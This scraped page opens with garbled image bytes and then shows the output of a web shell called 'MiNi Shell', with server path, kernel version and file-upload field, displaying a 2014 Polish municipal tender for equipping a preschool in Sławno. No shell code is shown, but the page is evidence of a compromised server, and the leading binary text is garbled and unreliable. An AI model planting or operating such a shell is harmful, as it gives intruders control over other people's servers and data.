JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140724/248524-N-2014.html

<p class="kh_header"><b>Sławno: Realizacja Projektu  Punkt Przedszkolny przy Publicznej Szkole Podstawowej 
w Zachorzowie z siedzibą w Psarach</b><br>
<b>Numer ogłoszenia: 248524 - 2014; data zamieszczenia: 24.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 044 755-18-50, faks 044 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja Projektu  Punkt Przedszkolny przy Publicznej Szkole Podstawowej 
w Zachorzowie z siedzibą w Psarach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszej umowy  jest realizacja Projektu Punkt Przedszkolny przy Publicznej Szkole Podstawowej w Zachorzowie z siedzibą w Psarach
2.Niniejsze postępowanie składa się z pięciu  części zamówienia tj. 
Część I  zamówienia 
Zakres przedmiotu zamówienie obejmuj  dostawę n/w  wyposażenia 
mebli, pomocy dydaktycznych, artykułów  plastycznych, zabawek, podręczników, lustra do prowadzenia zajęć z logopedą, Pomocy logopedycznych, tablicy informacyjnej o realizacji projektu
CZEŚĆ II
Dostawa telewizora, odtwarzacza DVD, radioodtwarzacza, zmywarki, odkurzacza, laptopa, drukarki
CZEŚĆ III
Dostawa termosów, talerzy kubków, sztućcy
CZEŚĆ IV
Dostawa karuzeli, huśtawki, zjeżdżalni
CZEŚĆ V
Logopeda.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.16.21.00-6, 39.11.20.00-0, 39.14.33.10-2, 39.14.13.00-5, 30.23.21.10-8, 32.32.46.00-6, 39.71.34.30-6, 39.71.31.00-4, 39.22.11.50-3, 39.22.12.10-2, 39.22.30.00-1, 33.76.10.00-2, 39.83.12.10-1, 33.76.30.00-6, 37.53.52.30-8, 37.53.52.40-1, 37.53.51.00-8, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony we wszystkich pozycjach  formularz ofertowy (wg załączonego wzoru Nr 1 ) 
2.	Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia )
do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione 
do tych czynności dokumentem rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców ubiegających się o zamówienie wspólnie ( np. konsorcjum, 
sp. cywilna ), pełnomocnictwo powinno jednoznacznie   określać zakres umocowania  
i wskazywać osobę pełnomocnika.
3.	Formularz specyfikacji  cenowej ( nie podlegają ocenie ) służą celom poglądowym - wg załącznik Nr 7.1.- 7.5 do siwz wg części zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2014 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój nr 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja zamówienia w ramach projektu Punkt Przedszkolny przy Publicznej Szkole Podstawowej w Zachorzowie z siedzibą w Psarach  współfinansowanego  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego 

Priorytet IX.  Rozwój wykształcenia i kompetencji w regionach,
Działanie 9.1.  Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych  świadczonych w systemie oświaty
Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa   wyposażenia 
mebli, pomocy dydaktycznych, artykułów  plastycznych, zabawek, podręczników, lustra do prowadzenia zajęć z logopedą, pomocy logopedycznych, tablicy informacyjnej o realizacji projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment		j.m.	Ilość
	
Zadanie 1 - Prowadzenie punktu przedszkolnego  
	

	


1.		1.Meblościanka 		szt.	1
2.		2.Stoliki		szt.	6
3.		3.Krzesełka 		szt.	25
4.		4.Biurko		szt.	1
5.		5.Krzesło		szt.	1
6.		9. Dywan		szt.	1
7.		10. Siedziska zabawowe 		szt.	6
8.		11. Poducha zabawowo- ćwiczeniowa		szt.	4
9.		12.Poducha sensoryczna		szt.	2
10.		13. Bujak piankowy 		szt.	3
11.		14.Tablica korkowa 		szt.	2
12.		15. Tablica magnetyczna 		szt.	1
13.		16.Tablica suchościeralna		szt.	1
14.		17. Regał szatniowy		szt.	5
15.		20. Szafki na naczynia 		szt.	1
16.		
37. Pomoce dydaktyczne 		kpl. 	1
	mapa Polski dla najmłodszych		szt.	 1 
	kosz na zabawki		szt.	4 
	sześcian z labiryntem		szt.	1
	puzzle cztery pory roku		szt.	4
	puzzle duo zwierzęce siedliska		szt.	1
	magnetyczne zwierzęta z dżungli		szt.	1
	gra rybki		szt.	1
	domino z pianki			szt.	1 
	duże kostki (kostki w kostkach)		kpl	1 
	jumbo kształty z pianki		szt.	1 
	kostka manipulacyjna		szt.	1
	młoteczkowa zabawa			szt.	1
	układanka kwadratowa mozaika		szt.	2
	zabawne przewlekanki		kpl.	1
	tunel zyg zag		szt.	1
	ścieżka dużych kamieni		szt.	1
	guzik z pętelką		szt.	1
	koraliki do nawlekania		szt.	1
	koraliki cyferki		szt.	1
	koraliki zwierzątka ogrodowe			szt.	1
	szlaczki na 4 pory roku		szt.	1
	krzesło budowniczego		szt.	1
	chusta animacyjna		szt.	1
	kolorowe szarfy niebieskie		szt.	15
	kolorowe szarfy żółte		szt.	15
	piłka jeżyk 20 cm		szt.	3
	zestaw muzyczny		szt.	1
	pacynki		szt.	1
	bajkowe kostiumy - czerwony kapturek		szt.	1
	łazik		szt.	1
	jezdzik z uchwytem		szt.	1
	samochód policyjny sterowany siłą napędu nóg			szt.	2
	samochód sterowany siłą napędu nóg		szt.	2
	rower żyrafa		szt.	1
	pojazd straż pożarna		szt.	1
	domek do zabawy		szt.	1
	trampolina średnia		szt.	1
	przesuwanka drzewko duże		szt.	1
	magnetyczna układanka geometryczne kształty			szt.	1
17.		38. Artykuły plastyczne 	



	kpl.	1
	brystol 		szt.	5
	brystol biały 		szt.	5
	wkład z kolorowego papieru rysunkowego 		szt.	10
	bloki techniczne kolor 		szt.	2
	tektura falista mix A4 po 10 arkuszy		szt.	4 
	biały papier ksero 500 szt		szt.	4
	nożyczki przedszkolne		szt.	25
	 bibuła 		szt.	5
	taśma samoprzylepna 		szt.	10
	taśma dwustronna		szt.	10
	kredki ołówkowe szkolne 24kolory		szt.	 5
	kredki w grubej oprawie 18 kolorów 10 sztuk		szt.	15
	ołówki z temperówką
(kpl.4szt)		szt.	7 
	zestaw gumek do ścierania		szt.	1
	zestaw temperówek		szt.	1
	piankowe kwiatuszki 150 szt.		szt.	1
	kwiatki, serca, ważki 500szt		szt.	1
	kwiatuszki wklejane błyszczące 1250 szt.		szt.	1
	szablony do wycinania( kwiatuszki, serduszka,)		szt.	2
	szablony do wycinania(motylki,
gwiazdki		szt.	2
	klej w sztyfcie		szt.	25
	zestaw mazaków 		szt.	1
	dziurkacz biurowy		szt.	1
	zszywacz biurowy		szt.	1
	tempery 6 kolorów		szt.	5 
	farby plakatowe 12 kolorów		szt.	5
	zestaw pędzli do malowania kpl.30szt		szt.	1
	szary papier 20 arkuszy		szt.	2
	papier tęczowy 10 arkuszy		szt.	2
	papier witrażowy- papiery w rolkach czerwono złoty		szt.	2
	nożyczki metalowe z wzorkami  kpl.		szt.	2
	dziurkacze ażurowe		szt.	1
	dziurkacz narożny		szt.	1
	druciki kreatywne kolorowe komplet		szt.	2
	druciki kreatywne w paski komplet		szt.	 2
	prasa do papieru serca		szt.	1
	prasa do papieru kwiatki		szt.	1 
	masa plastyczna		szt.	2
	plastelina 12 kolorów		szt.	4
	foremki do masy plastycznej - owoce zestaw		szt.	1
	foremki do masy plastycznej- zwierzątka		szt.	1
	oczka 560 elementów		szt.	1
	kolorowe ruchome oczka zestaw		szt.	2
	tektura falista tęczowa zestaw		szt.	2
	kółka do origami małe zestaw		szt.	2
	kółka do origami średnie zestaw		szt.	2
	stempelki owoce 		szt.	1
	stempelki warzywa		szt.	1
	dziurkacz do robienia puzzli		szt.	1
	brokatowe pudełeczko		szt.	2
	duże poduszki do stempli		szt.	2
	poduszka do stempli		szt.	1
18.		39. Zabawki		kpl	1
	kącik kuchenny 		szt.	1
	pralka		szt.	1
	duży zestaw obiadowy		szt.	2
	zestaw produktów spożywczych		szt.	1
	pieczywo		szt.	1
	zestaw jajek		szt.	1
	akcesoria kuchenne z czajnikiem		szt.	2
	akcesoria kuchenne z rondelkiem		szt.	2
	muzyczne odkrycia		szt.	1
	budynek dla zwierząt		szt.	1
	mały doktor		szt.	1
	żelazko		szt.	1
	deska do prasowania		szt.	1
	żółwik pełen kształtów		szt.	1
	telefonik dla gadułki		szt.	2
	klocki wafle (komplet)		szt.	1
	klocki z pianki		szt.	1
	klocki budowlane duże Wader		szt.	1
	klocki budowlane  wader		szt.	1
	klocki złączki		szt.	1
	klocki małego budowniczego		szt.	1
	klocki z magnesami		szt.	1
	duży zestaw do piasku		szt.	1
	taczka do piasku		szt.	2
	domek z mebelkami		szt.	1
	wywrotka gigant		szt.	1
	super straż pożarna		szt.	1
	helikopter		szt.	2
	traktor gigant z przyczepą		szt.	1
	 betoniarka gigant		szt.	2
	koparko- ładowarka gigant		szt.	2
	traktor gigant 		szt.	1
	gadająca skrzynka z narzędziami		szt.	1
	autka - kids car kpl.		szt.	1
	pojazdy		szt.	4
	pościel do łóżeczka dla lalek		szt.	1
	kołyska dla lalek		szt.	1
	wózek dla lalek trójkołowy		szt.	2
	wózek głęboki z nosidełkiem		szt.	2
	lalka z mimiką - Oliwka		szt.	2
	lalka mała z nocnikiem		szt.	2
	lalka bobas		szt.	4
	lalki szmacianki		szt.	3
	lalka duża 		szt.	2
19.		40. Podręczniki 		kpl.	25
20.	46.Lustro do prowadzenia zajęć
z logopedą		szt.	1
21.	47. Pomoce logopedyczne 		kpl.	1
	 klocki sensoryczne 		szt.	 1 
	 dmuchane lotto 		szt.	  1  
	 klocki dźwiękowe 		szt.	 1  
	 ścieżka drabinkowa 		szt.	 1
	 program komputerowy  słuch fonemowy 		szt.	 1
	 lotto dźwiękowe 		szt.	1	
22.	50. Tablica informacyjna
o realizacji projektu		szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.16.21.00-6, 39.11.20.00-0, 39.14.33.10-2, 39.14.13.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa telewizora, odtwarzacza DVD, radioodtwarzacza, zmywarki, odkurzacza, laptopa, drukarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Opis	j.m.	Ilość
	
Zadanie 1 - Prowadzenie punktu przedszkolnego  
	6.Telewizor		szt.	1
	7. Odtwarzacz DVD		szt	1
	8.Radioodtwarzacz		szt	1
	19. Zmywarka 		szt	1
	34 Odkurzacz		szt	1
	51. Laptop		szt	1
	52. Drukarka		szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 32.32.46.00-6, 39.71.34.30-6, 39.71.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZEŚĆ III:
Dostawa termosów, talerzy kubków, sztućcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Opis	j.m.	Ilość
	
Zadanie 1 - Prowadzenie punktu przedszkolnego  

	18* Termos	20 l 
	szt.	1
	18a Termos	15 l 
	szt.	1
	18b Termos	10 l

	szt.	1
	21Talerze		szt.	25
	22 Talerze		szt.	25
	23Talerze		szt.	25
	24Kubeczki		szt.	25
	25Widelce		szt.	25
	26Łyżki		szt.	25
	27Łyżeczki		szt.	25
	33. Środki czystości 	 w skład 4 kompletów wchodzi j. n. 
	Kpl.	4
a	Papier toaletowy		op.- 10 rolek	60
b	Ręczniki papierowe 		op.- 2 rolki	60
c	Mydło w płynie		szt. - 5 l 	8
d	Płyn do podłóg 		szt. - 1 l	8
e	Płyn do wc		szt. - 1l 	8
f	Płyn do zmywarki 		szt. - 1 l	8
g	tabletki do zmywarki  		szt	4





zakupy  w  2015 r. -  dostawa styczeń 


	33. Środki czystości 	w skład 6
 kompletów wchodzi j. n.	Kpl.	6
	Papier toaletowy		op. - 10 rolek	90
	Ręczniki papierowe 		op.- 2 rolki	90
	Mydło w płynie		szt. - 5 l 	12
	Płyn do podłóg 		szt. - 1 l	12
	Płyn do wc		szt. - 1l 	12
	Płyn do zmywarki 		szt. - 1 l	12
	tabletki do zmywarki  		szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.11.50-3, 39.22.12.10-2, 39.22.30.00-1, 33.76.10.00-1, 39.83.12.10-1, 33.76.30.33-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa karuzeli, huśtawki, zjeżdżalni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	j.m.	Ilość
	
Zadanie 1 - Prowadzenie punktu przedszkolnego  
	

	


1.		28. Karuzela	szt.	1
2.		29. Huśtawka	szt.	1
3.		30. Zjeżdżalnia 	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.30-8, 37.53.52.40-1, 37.53.51.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Logopeda - zorganizowanie i przeprowadzenie zajęć 
z logopedą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Logopeda -  zorganizowanie i przeprowadzenie zajęć z logopedą
Prowadzenie zajęć w jednej grupie przedszkolnej 
przeprowadzenie diagnozy na początku końcu projektu testu wiedzy na początku i po zrealizowanych zajęciach 

 Termin szkolenia:

	01.09.2014 r. - 30.06.2015 r.
	2 godziny tygodniowo 
	Liczba uczestników - 25 tj. 11 kobiet  i 14 mężczyzn 
	Liczba godzin: 80
Zamawiający zapewni salę dydaktyczną, rekrutację uczestników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com